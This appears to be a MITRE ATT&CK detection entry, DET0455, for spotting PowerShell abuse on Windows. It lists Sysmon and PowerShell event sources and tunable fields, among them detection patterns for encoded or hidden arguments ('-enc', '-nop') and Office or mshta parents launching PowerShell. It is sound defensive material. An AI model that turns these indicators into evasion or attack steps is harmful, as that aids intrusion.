DET0455 Abuse of PowerShell for Arbitrary Execution

Item	Value
ID	DET0455
Version	1.0
Created	21 October 2025
Last Modified	21 October 2025

Technique Detected: T1059.001 (PowerShell)

Analytics

Windows

AN1252

Detects behavioral chains where PowerShell is launched with encoded commands, unusual parent processes, or suspicious modules loaded, potentially followed by network connections or child process spawning. Supports detection of both direct (powershell.exe) and indirect (.NET automation) invocations.

Log Sources

Data Component	Name	Channel
Process Creation (DC0032)	WinEventLog:Sysmon	EventCode=1
Command Execution (DC0064)	WinEventLog:PowerShell	EventCode=4103, 4104, 4105, 4106
Process Metadata (DC0034)	WinEventLog:PowerShell	EventCode=400, 403
Module Load (DC0016)	WinEventLog:Sysmon	EventCode=7

Mutable Elements

Field	Description
CommandLinePattern	Regex pattern for encoded, obfuscated, or hidden PowerShell arguments (e.g., ‘-enc’, ‘-nop’).
ParentProcessName	Filter based on abnormal parents like Excel, WinWord, or mshta spawning PowerShell.
TimeWindow	Scope detection to off-hours, lateral movement timeframes, or non-maintenance windows.
LoadedModuleList	Tuneable to monitor rare or never-before-seen .NET assemblies tied to PowerShell abuse.
ScriptBlockLengthThreshold	Adjustable threshold for length of script blocks logged by Event ID 4104 (useful for filtering noise).